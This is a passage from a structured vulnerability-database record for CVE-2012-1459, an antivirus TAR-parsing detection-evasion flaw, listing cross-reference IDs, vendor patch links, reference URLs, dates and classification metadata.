            db: "BID",
            id: "52623",
         },
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
      ],
      trust: 2.34,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-54740",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1459",
            trust: 3.2,
         },
         {
            db: "BID",
            id: "52623",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80390",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80393",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80406",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80407",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
            trust: 0.8,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19231",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
            trust: 0.6,
         },
         {
            db: "PACKETSTORM",
            id: "113878",
            trust: 0.2,
         },
         {
            db: "PACKETSTORM",
            id: "115619",
            trust: 0.2,
         },
         {
            db: "PACKETSTORM",
            id: "113895",
            trust: 0.2,
         },
         {
            db: "VULHUB",
            id: "VHN-54740",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "113841",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   id: "VAR-201203-0144",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:08.445000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "AVL SDK",
            trust: 0.8,
            url: "http://www.antiy.net/",
         },
         {
            title: "Command Antivirus",
            trust: 0.8,
            url: "http://www.authentium.com/command/csavdownload.html",
         },
         {
            title: "avast! Antivirus",
            trust: 0.8,
            url: "https://www.avast.co.jp/index",
         },
         {
            title: "AVG Anti-Virus",
            trust: 0.8,
            url: "http://www.avgjapan.com/home-small-office-security/buy-antivirus",
         },
         {
            title: "AntiVir",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
         {
            title: "Rising Antivirus",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Bitdefender",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "ClamAV",
            trust: 0.8,
            url: "http://www.clamav.net/lang/en/",
         },
         {
            title: "Comodo Antivirus",
            trust: 0.8,
            url: "http://www.comodo.com/home/internet-security/antivirus.php",
         },
         {
            title: "Emsisoft Anti-Malware",
            trust: 0.8,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            title: "ESET NOD32アンチウイルス",
            trust: 0.8,
            url: "http://www.eset.com/us/",
         },
         {
            title: "Fortinet Antivirus",
            trust: 0.8,
            url: "http://www.fortinet.com/solutions/antivirus.html",
         },
         {
            title: "F-Prot Antivirus",
            trust: 0.8,
            url: "http://www.f-prot.com/index.html",
         },
         {
            title: "G Data AntiVirus",
            trust: 0.8,
            url: "http://www.gdata.co.jp/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/en/",
         },
         {
            title: "Jiangmin Antivirus",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "K7 AntiVirus",
            trust: 0.8,
            url: "http://www.k7computing.com/en/consumer_home.php",
         },
         {
            title: "McAfee Web Gateway",
            trust: 0.8,
            url: "http://www.mcafee.com/us/products/web-gateway.aspx",
         },
         {
            title: "McAfee Scan Engine",
            trust: 0.8,
            url: "http://www.mcafee.com/us/support/support-eol-scan-engine.aspx",
         },
         {
            title: "Norman Antivirus",
            trust: 0.8,
            url: "http://www.norman.com/products/antivirus_antispyware/en",
         },
         {
            title: "nProtect Anti-Virus",
            trust: 0.8,
            url: "http://global.nprotect.com/product/avs.php",
         },
         {
            title: "openSUSE-SU-2012:0833",
            trust: 0.8,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            title: "Panda Antivirus",
            trust: 0.8,
            url: "http://www.ps-japan.co.jp/",
         },
         {
            title: "PC Tools AntiVirus",
            trust: 0.8,
            url: "http://www.pctools.com/jp/spyware-doctor-antivirus/",
         },
         {
            title: "Quick Heal",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Sophos Anti-Virus",
            trust: 0.8,
            url: "http://www.sophos.com/ja-jp/",
         },
         {
            title: "Endpoint Protection",
            trust: 0.8,
            url: "http://www.symantec.com/ja/jp/endpoint-protection",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/home/index.html",
         },
         {
            title: "Trend Micro HouseCall",
            trust: 0.8,
            url: "http://jp.trendmicro.com/jp/tools/housecall/index.html",
         },
         {
            title: "VBA32",
            trust: 0.8,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            title: "VirusBuster",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en",
         },
         {
            title: "V3 Internet Security",
            trust: 0.8,
            url: "http://www.ahnlab.co.jp/product_service/product/b2b/v3is8.asp",
         },
         {
            title: "Kaspersky Anti-Virus",
            trust: 0.8,
            url: "http://www.kaspersky.com/kaspersky_anti-virus",
         },
         {
            title: "Microsoft Security Essentials",
            trust: 0.8,
            url: "http://windows.microsoft.com/ja-jp/windows/products/security-essentials",
         },
         {
            title: "F-Secure Anti-Virus",
            trust: 0.8,
            url: "http://www.f-secure.com/ja/web/home_jp/protection/anti-virus/overview",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52623",
         },
         {
            trust: 1.1,
            url: "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80390",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80393",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80406",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80407",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 1.1,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74302",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1459",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19231",
         },
         {
            trust: 0.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1459",
         },
         {
            trust: 0.4,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1458",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.authentium.com",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avg.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.bitdefender.com",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.f-prot.com/",
         },
         {
            trust: 0.3,
            url: "http://www.gdatasoftware.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://www.microsoft.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.rising-global.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.3,
            url: "http://www.ubuntu.com/usn/usn-1482-1",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1457",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.3",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.3",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/bugs/1015405",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/bugs/1015337",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.2",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.2",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/advisories",
         },
         {
            trust: 0.1,
            url: "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            db: "BID",
            id: "52623",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52623",
         },
         {
            date: "2012-03-23T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            date: "2012-08-17T02:36:21",
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            date: "2012-06-20T03:33:06",
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            date: "2012-06-20T02:54:11",
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            date: "2012-06-19T00:56:02",
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            date: "2012-03-21T10:11:49.597000",
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-01-18T00:00:00",
            db: "VULHUB",
            id: "VHN-54740",
         },
         {
            date: "2015-04-13T22:00:00",
            db: "BID",
            id: "52623",
         },
         {
            date: "2012-07-25T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
         {
            date: "2018-01-18T02:29:13.273000",
            db: "NVD",
            id: "CVE-2012-1459",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "PACKETSTORM",
            id: "115619",
         },
         {
            db: "PACKETSTORM",
            id: "113895",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
      trust: 1,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Vulnerability in the TAR file parsers of multiple products that prevents malware detection",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001869",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-422",
         },
      ],
      trust: 0.6,
   },
}